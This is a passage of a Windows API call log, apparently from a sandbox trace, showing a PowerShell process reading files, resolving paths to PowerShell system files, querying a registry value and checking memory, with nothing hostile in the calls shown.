	[0320.194] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.194] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.194] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.194] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.195] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.195] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.195] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.195] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.195] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.195] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.196] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.196] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.196] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.196] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.196] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.197] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.197] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.197] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.197] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.197] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.198] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.198] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0320.198] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0xf37, lpOverlapped=0x0) returned 1
	[0320.198] ReadFile (in: hFile=0x32c, lpBuffer=0x35f07ff, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f07ff*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0320.198] ReadFile (in: hFile=0x32c, lpBuffer=0x35f1160, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x35f1160*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0320.198] CloseHandle (hObject=0x32c) returned 1
	[0320.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0320.199] SetErrorMode (uMode=0x1) returned 0x1
	[0320.199] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd1c0 | out: lpFileInformation=0x1cd1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0320.199] SetErrorMode (uMode=0x1) returned 0x1
	[0320.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0320.199] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd2a8 | out: phkResult=0x1cd2a8*=0x32c) returned 0x0
	[0320.199] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd22c, lpData=0x0, lpcbData=0x1cd228*=0x0 | out: lpType=0x1cd22c*=0x1, lpData=0x0, lpcbData=0x1cd228*=0x56) returned 0x0
	[0320.199] CoTaskMemAlloc (cb=0x5a) returned 0x3d7030
	[0320.199] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1fc, lpData=0x3d7030, lpcbData=0x1cd1f8*=0x56 | out: lpType=0x1cd1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd1f8*=0x56) returned 0x0
	[0320.200] CoTaskMemFree (pv=0x3d7030) 
	[0320.200] RegCloseKey (hKey=0x32c) returned 0x0
	[0320.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0320.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0320.619] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xff23d877, Data2=0xa25b, Data3=0x4fe8, Data4=([0]=0x8d, [1]=0xfb, [2]=0x7d, [3]=0xee, [4]=0x35, [5]=0x57, [6]=0x4f, [7]=0x4a))) returned 0x0
	[0320.619] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa4ee4004, Data2=0xae29, Data3=0x45cb, Data4=([0]=0xa0, [1]=0xea, [2]=0x41, [3]=0xa3, [4]=0xb, [5]=0x6f, [6]=0xbe, [7]=0xf4))) returned 0x0
	[0320.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.657] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x89659632, Data2=0x74b8, Data3=0x4bef, Data4=([0]=0xb8, [1]=0xdb, [2]=0xbd, [3]=0x88, [4]=0x9c, [5]=0x7, [6]=0x6c, [7]=0xb4))) returned 0x0
	[0320.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.022] VirtualQuery (in: lpAddress=0x1cb4e0, lpBuffer=0x1cc3a0, dwLength=0x30 | out: lpBuffer=0x1cc3a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.022] VirtualQuery (in: lpAddress=0x1cb570, lpBuffer=0x1cc430, dwLength=0x30 | out: lpBuffer=0x1cc430*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.024] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.024] VirtualQuery (in: lpAddress=0x1cbcf0, lpBuffer=0x1ccbb0, dwLength=0x30 | out: lpBuffer=0x1ccbb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
